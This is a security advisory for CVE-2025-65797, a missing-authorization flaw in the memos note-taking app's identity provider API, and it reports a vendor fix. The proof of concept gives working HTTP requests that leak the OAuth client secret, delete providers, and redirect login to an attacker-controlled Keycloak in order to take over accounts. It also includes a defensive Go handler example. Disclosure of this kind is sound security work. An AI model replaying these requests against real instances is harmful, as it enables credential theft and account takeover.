usd-2025-57 | Broken Access Control in IDP Server
Product: memos
Affected Version: v0.25.2
Vulnerability Type: CWE-862: Missing Authorization
Security Risk: High
Vendor: usememos
Vendor URL: https://github.com/usememos/memos
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2025-65797
CVE Link: https://www.cve.org/CVERecord?id=CVE-2025-65797
Advisory ID: usd-2025-57
Description
Memos is a lightweight, self-hosted knowledge management and note-taking platform designed for personal use. The architecture features a Go backend paired with a React+Vite frontend, using gRPC for internal communication and providing REST API access through gRPC-Gateway. It supports multiple database backends (SQLite, MySQL, PostgreSQL) and includes features like file attachments, OAuth/SSO integration, activity logging, and internationalization.
The identity provider service, which manages the registered OAuth identity providers, is missing authorization checks on several operations. The client secret of each provider is exposed to unauthenticated users. Furthermore, any authenticated user can remove registered identity providers, creating a denial of service risk. Finally, any authenticated user can modify existing identity providers, which enables them to take over arbitrary accounts.
Proof of Concept
Information Leak
Unauthenticated users can request a list of registered identity providers via the following HTTP request.
GET /api/v1/identityProviders HTTP/1.1
Host: memos:5230
The response contains the client secret.
HTTP/1.1 200 OK
Content-Type: application/json
Grpc-Metadata-Content-Type: application/grpc
Vary: Origin
Content-Length: 614

{
  "identityProviders": [
    {
      "name": "identityProviders/1",
      "type": "OAUTH2",
      "title": "Keycloak",
      "identifierFilter": "",
      "config": {
        "oauth2Config": {
          "clientId": "memos",
          "clientSecret": "uaAxplLT2BMPBV9xSJPnWUt9MBmtM8cs",
          "authUrl": "http://keycloak:8000/realms/master/protocol/openid-connect/auth",
          [...],
          "fieldMapping": {
            [...]
          }
        }
      }
    }
  ]
}
The client secret can be used to impersonate the Memos instance at the identity provider. Since it was retrievable without authentication, operators of affected instances should rotate the secret at the identity provider after upgrading, not only upgrade.
Denial of Service
Authenticated, low-privileged users can delete registered identity providers via the following HTTP request.
DELETE /api/v1/identityProviders/1 HTTP/1.1
Host: memos:5230
Cookie: user_session=2-c2[... Session from low-privileged user ...]a6
This prevents further sign-ins via the removed provider and constitutes a denial of service.
Account Takeover
Authenticated, low-privileged users can modify the configuration of registered identity providers via the following HTTP request.
PATCH /api/v1/identityProviders/1?updateMask=config HTTP/1.1
Host: memos:5230
Content-Type: application/json
Cookie: user_session=2-c2[... Session from low-privileged user ...]a6
Content-Length: 621

{
  "name": "identityProviders/1",
  "type": "OAUTH2",
  "title": "KeycloakFromAttacker",
  "identifierFilter": "",
  "config": {
    "oauth2Config": {
      "clientId": "memos",
      "clientSecret": "uaAxplLT2BMPBV9xSJPnWUt9MBmtM8cs",
      "authUrl": "http://attacker-keycloak:8000/realms/master/protocol/openid-connect/auth",
      "tokenUrl": "http://attacker-keycloak:8000/realms/master/protocol/openid-connect/token",
      "userInfoUrl": "http://attacker-keycloak:8000/realms/master/protocol/openid-connect/userinfo",
      "scopes": [
        "openid",
        "profile",
        "email"
      ],
      "fieldMapping": {
        "identifier": "preferred_username",
        "displayName": "username",
        "email": "email",
        "avatarUrl": ""
      }
    }
  }
}
Because the field mapping binds the Memos account to the identifier claim (here preferred_username) returned by the now attacker-controlled userinfo endpoint, the malicious identity provider can return any existing username and thereby take over arbitrary accounts, including the host user. Note that the required usernames are accessible via the /api/v1/users/ endpoint.
Fix
Fixes for all mentioned vulnerabilities have been submitted as a pull request.
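The following is an added example of the authorization pattern such a fix needs, written for this advisory's readers in Go with net/http; it is neither memos' code nor the submitted pull request. A minimal in-memory handler keeps the provider list reachable for the login page but strips clientSecret for any caller who is not an admin, and rejects PATCH and DELETE from anonymous and low-privileged sessions before the record is touched. The session table, the cookie values, the role names and the placeholder secret are constructed assumptions for the example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// IdentityProvider keeps only the fields this example needs; JSON names follow the advisory.
type IdentityProvider struct {
	Name   string `json:"name"`
	Config struct {
		OAuth2 struct {
			ClientID     string `json:"clientId"`
			ClientSecret string `json:"clientSecret,omitempty"`
			AuthURL      string `json:"authUrl"`
		} `json:"oauth2Config"`
	} `json:"config"`
}

// Server is a constructed stand-in: providers keyed by resource name, plus a session table mapping user_session cookie values to a hypothetical role ("admin" or "user").
type Server struct {
	Providers map[string]IdentityProvider
	Sessions  map[string]string
}

// NewServer seeds one provider (placeholder secret, not the advisory's) and a made-up cookie per role.
func NewServer() *Server {
	p := IdentityProvider{Name: "identityProviders/1"}
	p.Config.OAuth2.ClientID, p.Config.OAuth2.ClientSecret = "memos", "example-secret-not-real"
	p.Config.OAuth2.AuthURL = "http://keycloak:8000/realms/master/protocol/openid-connect/auth"
	sessions := map[string]string{"admin-session-cookie": "admin", "user-session-cookie": "user"}
	return &Server{Providers: map[string]IdentityProvider{p.Name: p}, Sessions: sessions}
}

// Redact drops the client secret: the login page needs authUrl to start the flow, while the secret is used only by the backend when it redeems the authorization code.
func Redact(p IdentityProvider) IdentityProvider {
	p.Config.OAuth2.ClientSecret = ""
	return p
}

func (s *Server) ServeHTTP(w http.ResponseWriter, r *http.Request) {
	role := "" // empty: no valid session (an unknown cookie value also yields "")
	if c, err := r.Cookie("user_session"); err == nil {
		role = s.Sessions[c.Value]
	}
	name := strings.TrimPrefix(r.URL.Path, "/api/v1/") // e.g. identityProviders/1
	switch r.Method {
	case http.MethodGet:
		// Listing stays reachable without a session, but the secret is serialised for an admin only.
		out := []IdentityProvider{}
		for _, p := range s.Providers {
			if role != "admin" {
				p = Redact(p)
			}
			out = append(out, p)
		}
		w.Header().Set("Content-Type", "application/json")
		_ = json.NewEncoder(w).Encode(map[string][]IdentityProvider{"identityProviders": out})
	case http.MethodPatch, http.MethodDelete:
		// The CWE-862 fix: gate on the role before the record is touched; 401 without a session, 403 for a non-admin.
		if role == "" {
			http.Error(w, "unauthenticated", http.StatusUnauthorized)
			return
		}
		if role != "admin" {
			http.Error(w, "permission denied", http.StatusForbidden)
			return
		}
		var p IdentityProvider
		if r.Method == http.MethodDelete {
			delete(s.Providers, name)
		} else if err := json.NewDecoder(r.Body).Decode(&p); err != nil {
			http.Error(w, err.Error(), http.StatusBadRequest)
			return
		} else {
			p.Name = name
			s.Providers[name] = p
		}
		w.WriteHeader(http.StatusOK)
	default:
		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
	}
}

// Do runs one request against the handler in-process and returns status and body; an empty cookie value means no session.
func Do(s *Server, method, path, cookie, body string) (int, string) {
	req := httptest.NewRequest(method, path, strings.NewReader(body))
	req.AddCookie(&http.Cookie{Name: "user_session", Value: cookie})
	rec := httptest.NewRecorder()
	s.ServeHTTP(rec, req)
	return rec.Code, rec.Body.String()
}

func main() {
	s := NewServer()
	fmt.Println(Do(s, "GET", "/api/v1/identityProviders", "", ""))
	fmt.Println(Do(s, "DELETE", "/api/v1/identityProviders/1", "user-session-cookie", ""))
}
```

With the constructed sessions, the anonymous GET returns the provider without a clientSecret field and the low-privileged DELETE returns 403. In a gRPC-Gateway deployment such as memos', the same role check belongs in the gRPC service method or an interceptor rather than in a REST-only layer, so that the REST and gRPC paths share it.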
References
Timeline
- 2025-11-03: First contact request
- 2025-11-04: Pull request submitted
- 2025-11-06: Commit merged to main by vendor
- 2025-11-25: Version 0.25.3 was released
- 2025-12-03: This advisory is published
Credits
This security vulnerability was identified by Florian Dewald of usd AG.